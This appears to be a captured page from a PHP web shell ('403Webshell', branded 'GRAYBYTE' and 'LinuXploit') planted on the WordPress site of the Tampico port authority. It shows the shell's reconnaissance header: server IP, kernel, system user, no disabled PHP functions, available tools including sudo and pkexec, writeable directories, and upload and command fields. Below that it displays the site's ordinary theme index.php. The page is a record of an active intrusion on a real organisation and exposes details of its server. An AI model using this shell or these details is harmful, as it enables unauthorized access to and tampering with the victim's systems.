- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.147.53.214
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/public_html/wp-content/APITAM_GOBMX/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/public_html/wp-content/APITAM_GOBMX/index.php
	<?php get_header(); ?>
<main class="page">
      

	 <div class="container">
<!-- Mensaje Alerta Mediport -->	
<div class="alert alert-warning alert-dismissible"><button aria-label="Close" class="close" data-dismiss="alert" type="button"><span aria-hidden="true">&times;</span></button>

<center><strong>&iexcl;Usuarios Mediport!</strong></center>

<p align="center">Se le notifica a la comunidad portuaria que para registrarse al sistema Mediport, deberan descargar y llenar el siguiente <a href="https://puertodetampico.com.mx/Documentos/SOLICITUD_INFORMACION_EMPRESAS.xlsx" target="_blank">Formato para registro de usuarios</a>, una vez llenado, favor de ingresar al <a href="http://consultarf.puertodetampico.com.mx/ayuda" target="_blank">Sistema de Tickets de Servicio Mediport</a>, solicitando el alta o baja de usuarios, adjuntado el formato y una carta firmada por el representante legal solicitando el servicio.</p>
</div>
<br>

<div class="alert alert-success alert-dismissible">
  <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
  <center><strong>¡Aviso Importante!</strong> </center>
	<center>Se comparte publicación en el Diario Oficial de la Federación, a efecto de sondear en el mercado si existen potenciales interesados, Informarción disponible en el siguiente <a href="https://puertodetampico.com.mx/Aviso_DOF_API_Tampico.pdf" target="_blank">Enlace.</a></center>
		 </div>
<!-- Fin Mensaje Alerta Mediport -->

<center><a href="https://puertodetampico.com.mx/aviso1.jpg" target="_blank"><img src="https://puertodetampico.com.mx/aviso1.jpg" width="400" height="200"></a></center>		 
<!--<center><img src="https://puertodetampico.com.mx/aviso1.jpg" width="400" height="200"></center> -->
		 
<div class="row">
	<hr class="red" />		 
<?php $cats_to_get = array('noticias'); ?>
<?php foreach($cats_to_get as $cat_to_get): ?>
<?php query_posts('category_name='.$cat_to_get.'&posts_per_page=3&orderby=date&order=DESC'); ?>
<h3><strong><?php single_cat_title() ?></strong></h3><br>
 <?php while (have_posts()) : the_post(); ?>
<div class="col-md-4">
<center><?php the_post_thumbnail( array(350,150) ); ?></center>
	
	<center><h5><a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>">
		<?php the_title(); ?></a></h5></center><br><center><h6><?php echo get_the_excerpt(); ?>...</h6></center>
	
	</div>

 <?php endwhile; ?> 
	<?php endforeach; ?>	

	</div>
			



	
<!-- Inicio Primera Sección -->		
<div class="row">
	<hr class="red" />
  <div class="col-md-4">
<?php $cats_to_get = array('tramites-y-servicios'); ?>
<?php foreach($cats_to_get as $cat_to_get): ?>
<?php query_posts('category_name='.$cat_to_get.'&posts_per_page=10&orderby=date&order=ASC'); ?>
<h4><strong><?php single_cat_title() ?></strong></h4>

	<?php while (have_posts()) : the_post(); ?><ul class="list-unstyled">
	<li>
<a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a>

	</li>
	<?php endwhile; ?>
 	<?php endforeach; ?>
	</ul>
</div>
	
  <div class="col-md-4">
	
<?php $cats_to_get = array('lo-relevante-del-puerto'); ?>
<?php foreach($cats_to_get as $cat_to_get): ?>
<?php query_posts('category_name='.$cat_to_get.'&posts_per_page=10&orderby=date&order=ASC'); ?>
<h4><strong><?php single_cat_title() ?></strong></h4>

	<?php while (have_posts()) : the_post(); ?><ul class="list-unstyled">
	<li>
<a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a>

	</li>
	<?php endwhile; ?>
 	<?php endforeach; ?>
	</ul>
	</div>
  <div class="col-md-4">
	<?php $cats_to_get = array('enlaces-relacionados'); ?>
<?php foreach($cats_to_get as $cat_to_get): ?>
<?php query_posts('category_name='.$cat_to_get.'&posts_per_page=10&orderby=date&order=ASC'); ?>
<h4><strong><?php single_cat_title() ?></strong></h4>
		<?php while (have_posts()) : the_post(); ?><ul class="list-unstyled">
	<li>
<a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a>

	</li>
	<?php endwhile; ?>
 	<?php endforeach; ?>
	</ul>
  
  <div id="myCarousel" class="carousel slide text-center" data-ride="carousel">
    <!-- Indicators -->
    <ol class="carousel-indicators">
      <li data-target="#myCarousel" data-slide-to="0" class="active"></li>
      <li data-target="#myCarousel" data-slide-to="1"></li>
      <li data-target="#myCarousel" data-slide-to="2"></li>
      <li data-target="#myCarousel" data-slide-to="3"></li>
      <li data-target="#myCarousel" data-slide-to="4"></li>
      <li data-target="#myCarousel" data-slide-to="5"></li>
      <li data-target="#myCarousel" data-slide-to="6"></li>
	  <li data-target="#myCarousel" data-slide-to="7"></li>
    </ol>

    <!-- Wrapper for slides -->
    <div class="carousel-inner" role="listbox">
	 <div class="item active">
        <center><a href="http://mediport.puertodetampico.com.mx" target="_blank" rel="alternate noopener noreferrer"><img src="https://puertodetampico.com.mx/enlaces/mediport.jpg" WIDTH=300 HEIGHT=180 alt="" /></a></center>
      </div>
      <div class="item">
       <center><a href="https://gob.mx/presidencia/" target="_blank" rel="alternate noopener noreferrer"><img src="https://puertodetampico.com.mx/enlaces/presidencia.jpg" WIDTH=300 HEIGHT=180 alt="" /></a></center>
      </div>
      <div class="item">
        <center><a href="http://gob.mx/sct" target="_blank" rel="alternate noopener noreferrer"><img src="https://puertodetampico.com.mx/enlaces/sct.jpg" WIDTH=300 HEIGHT=180 alt="" /></a></center>
      </div>
      <div class="item">
       <center><a href="https://inicio.ifai.org.mx/SitePages/ifai.aspx" target="_blank" rel="alternate noopener noreferrer"><img src="https://puertodetampico.com.mx/enlaces/inai.jpg" WIDTH=356 HEIGHT=180 alt="" /></a></center>
      </div>
      <div class="item">
        <center><a href="https://www.infomex.org.mx/gobiernofederal/home.action" target="_blank" rel="alternate noopener noreferrer"><img src="https://puertodetampico.com.mx/enlaces/infomex.jpg" WIDTH=300 HEIGHT=150 alt="" /></a></center>
      </div>
     
	<div class="item">
        <center><a href="/Comision_Federal_de_Competencia_Economica_ST-CFCE-2017-119.pdf" target="_blank" rel="alternate noopener noreferrer"><img src="https://puertodetampico.com.mx/enlaces/cofece.jpg" WIDTH=300 HEIGHT=180 alt="" /></a></center>
      </div>
      <div class="item">
        <center><a href="https://consultapublicamx.inai.org.mx:8080/vut-web/" target="_blank" rel="alternate noopener noreferrer"><img src="https://puertodetampico.com.mx/enlaces/sipot.jpg" WIDTH=300 HEIGHT=180 alt="" /></a></center>
      </div>
		<div class="item">
        <center><a href="https://consultapublicamx.inai.org.mx/vut-web/?idSujetoObigadoParametro=16&amp;idEntidadParametro=33&amp;idSectorParametro=21" target="_blank" rel="alternate noopener noreferrer"><img src="https://puertodetampico.com.mx/enlaces/sipotam.jpg" WIDTH=300 HEIGHT=180 alt="" /></a></center>
      </div>
    </div>

    <!-- Left and right controls -->
    <a class="left carousel-control" href="#myCarousel" role="button" data-slide="prev">
      <span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
      <span class="sr-only">Previous</span>
    </a>
    <a class="right carousel-control" href="#myCarousel" role="button" data-slide="next">
      <span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
      <span class="sr-only">Next</span>
    </a>
  </div>
		</div>


<ul class="list-unstyled">
</ul>
</div>
		 

<!-- Fin Primera Sección -->	

		 <!-- Inicio Video Comercial -->	
<h3>Video Comercial</h3>
<hr class="red" />
<div class="row">
  <div class="col-md-8"><center><iframe src="https://www.facebook.com/plugins/video.php?href=https%3A%2F%2Fwww.facebook.com%2Fapitampico%2Fvideos%2F281773812489772%2F&show_text=0&width=560" width="350" height="315" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true" allowFullScreen="true"></iframe></center></div>
  <div class="col-md-4">
	<center><h4><strong>Video Comercial de API Tampico</strong></h4></center>

<ul class="list-unstyled">
	<li class="sendEst">
	<p align="justify">Tampico es uno de los principales puertos en la costa este de México, sirviendo de entrada y salida, para productos mineros, petroquímicos, acero, madera y otros productos industriales.</p>
	</li>
</ul>
	<center>
<h4>Siguenos en ...</h4>
</center>

<table border="0" cellpadding="3" width="100%">
	<tbody>
		<tr>
			<td><a href="#" rel="external" target="_blank"><img alt="" border="0" src="" title="" /></a></td>
			<td><a href="https://twitter.com/API_Tampico" rel="external" target="_blank"><img alt="Twitter" border="0" src="https://puertodetampico.com.mx/sliders/twee_icon.png" title="Twitter" /></a></td>
			<td><a href="https://www.facebook.com/apitampico/" rel="external" target="_blank"><img alt="Facebook" border="0" src="https://puertodetampico.com.mx/sliders/face_icon.png" title="Facebook" /></a></td>
		</tr>
	</tbody>
</table>
	</div>
</div>
 <!-- Fín Video Comercial -->	
		 
		  <!-- Inicio Negocios, Rendición y Sector Portuario -->
<hr class="red" />
 <div class="row">
  <div class="col-md-4">
	 <?php $cats_to_get = array('negocios-en-el-puerto'); ?>
<?php foreach($cats_to_get as $cat_to_get): ?>
<?php query_posts('category_name='.$cat_to_get.'&posts_per_page=10&orderby=date&order=ASC'); ?>
<h4><strong><?php single_cat_title() ?></strong></h4>

	<?php while (have_posts()) : the_post(); ?><ul class="list-unstyled">
	<li>
<a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a>

	</li>
	<?php endwhile; ?>
 	<?php endforeach; ?>
	</ul>
	 </div>
  <div class="col-md-4">
	 <?php $cats_to_get = array('rendicion-de-cuentas'); ?>
<?php foreach($cats_to_get as $cat_to_get): ?>
<?php query_posts('category_name='.$cat_to_get.'&posts_per_page=10&orderby=date&order=ASC'); ?>
<h4><strong><?php single_cat_title() ?></strong></h4>

	<?php while (have_posts()) : the_post(); ?><ul class="list-unstyled">
	<li>
<a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a>

	</li>
	<?php endwhile; ?>
 	<?php endforeach; ?>
	</ul>
	 </div>
  <div class="col-md-4">
	 <?php $cats_to_get = array('sector-portuario'); ?>
<?php foreach($cats_to_get as $cat_to_get): ?>
<?php query_posts('category_name='.$cat_to_get.'&posts_per_page=10&orderby=date&order=ASC'); ?>
<h4><strong><?php single_cat_title() ?></strong></h4>

	<?php while (have_posts()) : the_post(); ?><ul class="list-unstyled">
	<li>
<a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a>

	</li>
	 <?php endwhile; ?>
 	<?php endforeach; ?>
	</ul>
	 </div>
</div>
<!-- Fín Negocios, Rendición y Sector Portuario -->
		 
<!-- Inicio Copyright -->	
<div class="row"><hr class="red" />
	<center>&copy;<?php echo date("Y"); ?> Todos los Derechos Reservados</center>
<center><h8>Edificio API Tampico S/N, Recinto Portuario, Zona Centro</h8></center>
<center><h8>C.P. 89000, Tel. <a href="tel:8332411400">+52 833 2411400</a></h8></center>
<center><h8>Tampico, Tamaulipas</h8></center>
	</div>
<!-- Inicio Copyright -->			
		 </div>

</main>
	

	

<?php get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit